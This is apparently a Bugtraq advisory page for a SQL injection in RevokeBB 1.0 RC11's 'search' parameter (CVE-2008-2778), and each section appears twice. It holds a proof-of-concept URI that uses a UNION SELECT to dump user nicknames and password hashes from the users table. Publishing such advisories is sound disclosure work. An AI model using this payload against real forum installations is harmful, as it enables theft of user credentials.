RevokeBB 'search' Parameter SQL Injection Vulnerability
BID:29393
Info
RevokeBB 'search' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 29393 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2778 |
| Remote: | Yes |
| Local: | No |
| Published: | May 27 2008 12:00AM |
| Updated: | May 07 2015 05:28PM |
| Credit: | The:Paradox |
| Vulnerable: |
RevokeBB RevokeBB 1.0 RC11 |
| Not Vulnerable: | |
Discussion
RevokeBB 'search' Parameter SQL Injection Vulnerability
RevokeBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
RevokeBB 1.0 RC11 is vulnerable; other versions may also be affected.
RevokeBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
RevokeBB 1.0 RC11 is vulnerable; other versions may also be affected.
Exploit / POC
RevokeBB 'search' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/RevokeBB/?search=|The:Paradox|%25%27/**/union/**/select/**/1,2,3,4,5,6,concat(user_nick,0x3a,user_password),8,9,10,11,12,13,14,15,16,17,18/**/from/**/revokebb_users/**/where/**/user_id=1/*
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/RevokeBB/?search=|The:Paradox|%25%27/**/union/**/select/**/1,2,3,4,5,6,concat(user_nick,0x3a,user_password),8,9,10,11,12,13,14,15,16,17,18/**/from/**/revokebb_users/**/where/**/user_id=1/*
Solution / Fix
RevokeBB 'search' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].